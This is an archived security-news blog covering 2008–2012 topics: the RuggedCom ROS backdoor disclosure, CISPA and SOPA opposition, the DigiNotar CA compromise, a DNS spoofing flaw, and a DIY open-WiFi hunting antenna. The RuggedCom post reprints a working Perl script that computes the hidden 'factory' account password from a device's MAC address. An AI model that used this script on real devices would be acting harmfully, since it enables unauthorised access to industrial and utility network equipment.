Your security, networking, programming, and application news source.
Google
Showing posts with label network. Show all posts
Showing posts with label network. Show all posts

Tuesday, April 24, 2012

RuggedCom Unresponsive, Rugged Operating System (ROS®) Backdoor Disclosed

A factory backdoor account in RuggedCom's Rugged Operating System (ROS®) has been disclosed. <RuggedCom> is a manufacturer of rugged networking equipment popular in industrial, utility, and defense industries. These sensitive consumers of frequently security sensitive networking devices have recently been informed by RuggedCom, who has acknowledged the backdoor. Due somewhat to RuggedCom's unresponsiveness after acknowledgement, this information was publicly disclosed. According to the disclosure, an undocumented account, "factory", which cannot be disabled, is included in all released versions of ROS® with a password generated from the device's MAC address.

<Secunia - Full Disclosure CVE-2012-1803 (April 23, 2012)>

#!/usr/bin/perl
if (! defined $ARGV[0]) {
print "+========================================== \n";
print "+ RuggedCom ROS Backdoor Password Generator \n";
print "+ JC CREW April 23 2012 \n";
print "+ Usage:\n$0 macaddress \n";
print "+========================================== \n";
exit; }
$a = $ARGV[0];
$a =~  s/[^A-F0-9]+//simg;
@b = reverse split /(\S{2})/,$a;
$c = join "", @b;
$c .= "0000";
$d = hex($c) % 999999929;
print "$d\n";

Sunday, April 22, 2012

CISPA - US Internet Survalience Bill

Customers voice their opinion to supporters of the newest dangerous Internet bill, CISPA (H.R. 3523).



Cyber Intelligence Sharing and Protection Act (CISPA), also known as H.R. 3523, is not just another horribly irresponsible SOPA / PIPA. This bill focuses on a real issue, but does it the most horrible and irresponsible way possible.

CISPA is meant to lay the foundation for private companies and Internet service providers to share information with the US Government about cyber security threats. The main problems are the lack of any real definition to what a threat is, the bypassing of all existing laws to protect collection and sharing of your personal data by private companies, the lack of restriction of what information can be shared and with who, the warrant-less unrestricted sharing of data with the NSA, DHS, and other government agencies, and encouragement of heavy broad surveillance of citizens.

This bill will directly encourage private companies such as your cellular carrier (Verizon / AT&T), your operating system (Microsoft), your anti virus scanner (Symantec), and your Internet service provider (ISP) to collect huge amounts of your personal data to a level that would previously be illegal. This CISPA authority would override privacy protection laws (such as protecting of your medical records), local eavesdropping and wiretapping laws, and allow collection of almost any data based on recklessly vague "cybersecurity" purposes. This private companies would be able to collect this data anonymously without ever having to tell you they collected it or what they collected. They would be free to share the data with any company they want, possibly even selling the data, with complete immunity to legal actions such as lawsuits of criminal charges for privacy violations. They would be allowed to dump all this data on any US Government agency without requiring a warrant.

This is at the wake of the NSA beginning building the country's biggest spy center in Utah. As well as a recent NSA whistle-blower's claim that the US Government has illegally been engaged in wide spread Internet surveillance for quite some time having intercepted 20 Trillion communications and has copies of "most of your Emails". Again, illegally and therefor with no oversight, I might add.

CISPA (H.R. 3523) is another horrible dangerous and irresponsible bill that will erode all existing personal data and privacy protection laws, and give ALL your data to private companies to use and abuse under the table with complete immunity from legal repercussions.

Verizon disgustingly supports this bill. We call on you, Verizon, to change your stance away from this strong-arm theft and abuse of citizens personal data!

Verizon's letter of support for CISPA:
http://intelligence.house.gov/sites/intelligence.house.gov/files/documents/Verizon113011.pdf


More Information:

Electronic Freedom Foundation:
http://cyberspying.eff.org/

TIME Magazine:
http://techland.time.com/2012/04/19/5-reasons-the-cispa-cybersecurity-bill-should-be-tossed/



Source: Verizon Wireless Community Forum
April 22, 2012 12:00PM
(The original text has been modified for formatting, linking, and alignment.)

Some other supporters:
  • AT&T
  • Boeing
  • BSA
  • Business Roundtable
  • CSC
  • COMPTEL
  • CTIA - The Wireless Association
  • Cyber, Space & Intelligence Association
  • Edison Electric
  • EMC
  • Exelon
  • Facebook
  • The Financial Services Roundtable
  • IBM
  • Independent Telephone & Telecommunications Alliance
  • Information Technology Industry Council
  • Intel
  • Internet Security Alliance
  • Lockheed Martin
  • Microsoft
  • National Cable & Telecommunications Association
  • NDIA
  • Oracle
  • Symantec
  • TechAmerica
  • US Chamber of Commerce
  • US Telecom - The Broadband Association
  • Verizon

Tuesday, January 17, 2012

Fight SOPA and PROTECT IP

This blog would be forced offline if the currently proposed U.S. legislature is passed.

SOPA and PROTECT IP are poorly defined, easily abused, unclear bills proposed to the U.S. House and Senate with unrealistic expectations of Internet technology, which will stifle free speech and innovation while giving the U.S. Government the ability to censor the U.S. Internet and seize U.S. domain names with little reason or limitation. Enforcement of these bills would require the restructuring of many web services which would affect Internet users globally.

These bills threaten a blog like this through vague terminology lacking definitions, such as "committing or facilitating the commission of criminal violations" [of copyright infringement or counterfeit products]. "Facilitation" can often be argued as simply teaching or demonstrating how to do something. As I interpret this, any website with Hacking/Hacker/Hack in the name or topic would technically be automatically out of compliance and be at the mercy of enforcement of these laws to not permanently seize associated domain names and possibly further prosecute owners.

These bills create a largely undefined take down process that will clearly leave many types of web services, such as the free blog host here at blogger.com, unable to meet requirements. No provisions for abuse make these vague bills a prime target for more abuse than the DMCA takedown request system has historically endured.

Some other concerning areas of these bills include provisions against circumvention of such measures, which the U.S. State department funds creating hypocritical tools for doing just that, to offer citizens under [foreign]"repressive regimes" uncensored access to the internet.

Please do all you can to educate the public and urge U.S. citizens to contact their government representatives urging them to vote against these reckless bills.


Bill text PROTECT IP (Senate):
http://hdl.loc.gov/loc.uscongress/legislation.112s968

Bill text SOPA - Stop Online Piracy Act (House):
http://hdl.loc.gov/loc.uscongress/legislation.112hr3261

A Layman's examination:
http://blog.reddit.com/2012/01/technical-examination-of-sopa-and.html

History of DCMA takedown abuse:
https://www.eff.org/takedowns

How these bills violate free speech and innovation:
https://www.eff.org/deeplinks/2012/01/how-pipa-and-sopa-violate-white-house-principles-supporting-free-speech

U.S. State department funds tools to circumvent censoring:
http://www.bloomberg.com/news/2011-04-20/u-s-funds-help-democracy-activists-evade-internet-crackdowns.html

I apologize for any inconvenience. We will be returning soon.

SoCo

Thursday, December 8, 2011

Another CA Compromised

itworld.com
Lucian Constantin, IDG News Service (December 08, 2011)

<Dutch SSL certificate provider Gemnet investigates website compromise>

Saturday, November 19, 2011

Tuesday, October 25, 2011

Tuesday, August 30, 2011

DigiNotar Issued Fraudulent Google Certificate

<DigiNotar> is a Dutch Certificate Authority who issued a rogue SSL certificate to somebody in Iran on July 10th, 2011 for the domain name .google.com. This allows the certificate holders the ability to possibly carry out a man in the middle attack on most of Google's services, including GMail, Google+, and Google Docs.

DigiNotar is a wholly owned subsidiary of VASCO Data Security International. On August 30, 2011 <VASCO released a public statement> acknowledging that their DigiNotar Certificate Authority infrastructure was hacked on July 19, 2011, and was used to issue fraudulent CA's for a number of domains, including Google.com. <Some digging by F-Secure> found defacements left over from at least two separate intrusions that could be years old.

The Google Chrome browser <has an extra fine grained set of CA's with the authority to sign for Google> which is rumored to have protected Google Chrome users.

Firefox suggested revoking DigiNotar and <provides instructions for revoking the CA> in your local browser.


Fraudulent Digital Certificates Could Allow Spoofing (Aug 29, 2011)
<Microsoft Security Advisory (2607712)>

UPDATE (Aug 31, 2011):
<Mozilla pushes Firefox 6.0.1 update explicitly to revoke the DigiNotar CA>

Monday, December 1, 2008

[Link] 100 Best Open Source Security Tools

A great list of 100 open source security tools. They are categorized; each having a short description and link to it's home page. I can see most of my favorites in the list.

Masters in Criminal Justice (Nov 26, 2008)

<100 Best Open Source Security Tools>

Tuesday, October 7, 2008

Google Project: Obfuscated TCP

From the <Obfuscated TCP Project's Home>,

"Obfuscated TCP is a transport layer protocol that adds opportunistic encryption. It's designed to hamper and detect large-scale wiretapping and corruption of TCP traffic on the Internet."

View the <quick YouTube explanation>:

Sunday, September 14, 2008

SoCo Software Releases C++ Yahoo Source Code

  <SoCo Software> has released <XLibrary>, a C++ repository of source code modules. Included are Windows sockets, Yahoo chat, and Yahoo captcha modules. This library is released under a custom license similar to the <OS-CPL> which doesn't force adoption of open source licenses.

  SoCo Software has provided free tools, scripts, and applications with source code, for a few years now. It is one of the few places where you can find a <free proxy tester> with source code. Most free proxy testers are released by proxy list sites, so you can help them find fast proxies, while getting the bottom of the barrel.

  The software site is using this library release as the beginning in a line of additions of source code libraries and snippets, including embedded (ASM and Dynamic C) and web application (JavaScript and PHP) source code.

Wednesday, July 23, 2008

Wednesday, July 9, 2008

DNS Design Flaw Allows Spoofing

DNS

(July 8, 2008) United States Computer Emergency Readiness Team (US-CERT) Vulnerability notice <#800113> regarding a DNS Cache Poisoning Issue.

"It is a fundamental issue affecting the design. Because the system is behaving exactly like it is supposed to behave, the same bug will show up in vendor after vendor after vendor.", says Dan Kaminsky, director of penetration testing, at the <IOActive> security firm. Kaminsky found this flaw more than six months ago while doing non-security related research of the DNS system.

A number of software vendors released patches Tuesday, July 8th. A patch <was released>(July 8, 2008) by Microsoft, being it's scheduled update day, and a patch <was also released> (July 8, 2008) for the Berkeley Internet Name Domain (BIND) server. The <Security Focus article> (July 8, 2008) claims both Cisco and Juniper also acknowledged flawed systems (but haven't released patches).

Friday, May 30, 2008

TCP Reset Injection Detection Utility

  An interesting source, <NNSquad> (Network Neutrality Squad), has released an open source tool (licensed under <LGPL>) to detect TCP reset (RST) packets that may have been injected into a TCP connection by a party other than the endpoints.
  The <NNSquad Network Measurement Agent (NNMA)> tool's available downloads are beta and include a Windows 2000/XP/Vista installer binary and <VC++ 6.0> Windows source code.
  TCP reset injection has been discovered being controversially used by internet service providers, such as <Comcast>, to disrupt torrent and P2P file sharing.

Thursday, April 17, 2008

The WIFI Predator [DIYS]


  Do it yourself high-powered antenna with custom firmware to activly search out open wireless connections.


Assembly Instructions:

<The Wifi Predator> - 4 Step Assembly Instructions at I-Hacked.com (April 14 2008)

Hardware List:


  • Buffalo WHR-HP-G54

  • HyperLink 2.4GHz 14.5 Yagi Antenna

  • Reverse Polarity SMA Male to Male N-type adapter.

  • Sears’s Ultra-Cheap camera tripod



Sofware/Firmware List:

  • <DD-WRT firmware>modification of the original Linksys Firmware

  • <AutoAP add on> to DD-WRT that allows routers to continuously scan for and connect to open wireless networks.